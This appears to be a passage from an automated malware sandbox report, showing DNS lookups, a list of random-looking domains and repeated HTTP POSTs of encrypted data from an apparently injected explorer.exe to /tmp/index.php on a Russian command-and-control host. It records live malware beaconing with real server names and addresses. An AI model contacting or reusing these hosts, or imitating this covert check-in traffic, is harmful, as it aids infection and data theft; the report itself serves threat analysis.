Oct 3, 2024 23:30:10.960165977 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960165977 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960165977 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		62.150.232.50	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960165977 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		189.165.155.245	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960165977 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

23.145.40.164

https:

calvinandhalls.com

dwgdbsxrjnnesjc.org

nwgrus.ru

jdfqkdrqtsch.com

yjbjsjjdituglvfr.net

ifilpxcdnwgbgge.org

ciwodbbyumgi.org

uctglujhyyn.com

semcigauupb.net

mjkmetahcah.com

fkvpkdvartxwe.org

hqcqhgjcmtgx.com

uwtleoojxrcvopte.net

puvaafsthshrcum.org

dvyvdbiqyxa.org

vjfbbnssutajqo.com

icltdtwcxuda.org

hxmpwtofksapy.com

prhupsyenaon.com

pjcbyveqviwch.org

uppdgnyegjvory.com

ldpymxrfawi.net

ucebrpsptgm.com

wvyisbukobdqdei.org

kymcsuriadoaei.org

wypsmdkfdcadpn.net

erjyaeignxsu.com

mcjitqwtqilsk.com

cweiuociftg.net

ncmvgkvwguax.org

trelswnfdtmn.org

mltvlrabpgii.net

wfqqxnqsmcop.net

gottjuiosjatm.org

sgntleolvdwaddkp.com

jevspcjflxdrnyqd.com

xvjdoetwalpqj.net

rsomhlsnqixrhe.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49755	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:24.957062960 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dwgdbsxrjnnesjc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: nwgrus.ru
Oct 3, 2024 23:27:24.957086086 CEST	286	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 70 59 df ad Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA .[k,vupYUTh}[m_xU{h{!8T'KYE]x/P3M.I_'N_Jm4yQY]Z!CJyZktZDUc)V<9
Oct 3, 2024 23:27:26.349044085 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 86 ea Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49765	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:26.370758057 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jdfqkdrqtsch.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 324 Host: nwgrus.ru
Oct 3, 2024 23:27:26.370771885 CEST	324	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 6e 49 da 85 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vunIX)YQmH+}J<jn[{m(Y[I],:RR-:(iY4Mw6!G;E %D(Zx{#`C+8T)i
Oct 3, 2024 23:27:27.757612944 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49776	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:27.767014027 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yjbjsjjdituglvfr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 268 Host: nwgrus.ru
Oct 3, 2024 23:27:27.767029047 CEST	268	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 5e 57 e5 b9 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vu^W_dpFWL[wp]L\2(m?D:;,B,W<B?yC7RAC&#(V2${pIYvig{k SWi
Oct 3, 2024 23:27:29.193905115 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49787	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:29.202608109 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ifilpxcdnwgbgge.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 117 Host: nwgrus.ru
Oct 3, 2024 23:27:29.202635050 CEST	117	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 45 01 a6 e1 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vuE>TOlSkZw;\|jFq
Oct 3, 2024 23:27:30.542697906 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:30 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49798	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:30.551434994 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ciwodbbyumgi.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 300 Host: nwgrus.ru
Oct 3, 2024 23:27:30.551450014 CEST	300	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 5e 39 df 85 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vu^9r[\a\U'wiJUOvPD?PMV=.3\vnOW7Xm9`&_UHLh&jE=[Qw6{=Kz
Oct 3, 2024 23:27:31.904184103 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49807	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:31.912558079 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uctglujhyyn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 177 Host: nwgrus.ru
Oct 3, 2024 23:27:31.912573099 CEST	177	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 74 14 ef 9c Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vut<i7C"{*8]ktcc[6,2RB$mSPSw0s\e-
Oct 3, 2024 23:27:33.285248995 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:33 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49815	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:33.294157982 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://semcigauupb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 145 Host: nwgrus.ru
Oct 3, 2024 23:27:33.294157982 CEST	145	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 21 32 be ae Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vu!2^;BtXTX>X/CLu:T;1<d!N#
Oct 3, 2024 23:27:34.674696922 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:34 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49826	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:34.684005022 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mjkmetahcah.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 211 Host: nwgrus.ru
Oct 3, 2024 23:27:34.684005022 CEST	211	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 55 4f df b5 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vuUObD_vh".?3]kt]LSVNB/FSGvWTDh=CCN7-J!R>o_%Yr
Oct 3, 2024 23:27:36.197139025 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49836	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:36.206881046 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fkvpkdvartxwe.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 304 Host: nwgrus.ru
Oct 3, 2024 23:27:36.206906080 CEST	304	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 5d 1c dc bc Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vu]~af@58#[R6y%-ggSZgv+#(P? OqF}=uO19OC@>wydrmFD
Oct 3, 2024 23:27:37.768666029 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49847	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:37.781622887 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hqcqhgjcmtgx.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 211 Host: nwgrus.ru
Oct 3, 2024 23:27:37.781686068 CEST	211	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 20 58 e9 ab Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vu X\Atgu8LD!?w7IewGH%Y3&}vzXR\|oU=Dz025A\Hr
Oct 3, 2024 23:27:39.167846918 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:38 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49857	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:39.176706076 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uwtleoojxrcvopte.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 310 Host: nwgrus.ru
Oct 3, 2024 23:27:39.176717997 CEST	310	OUT	Data Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 32 5a f9 94 Data Ascii: ;nRQqs~yctzDbW+lV?#1\|J7 M@NA -[k,vu2Z\JLpPy?8?rpx?n.Z]S3W"CBB6s5BVx1~i!,Y%c:%b*['
Oct 3, 2024 23:27:40.552094936 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 21:27:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49866	190.224.203.37	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 23:27:40.648149967 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://puvaafsthshrcum.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 339 Host: nwgrus.ru
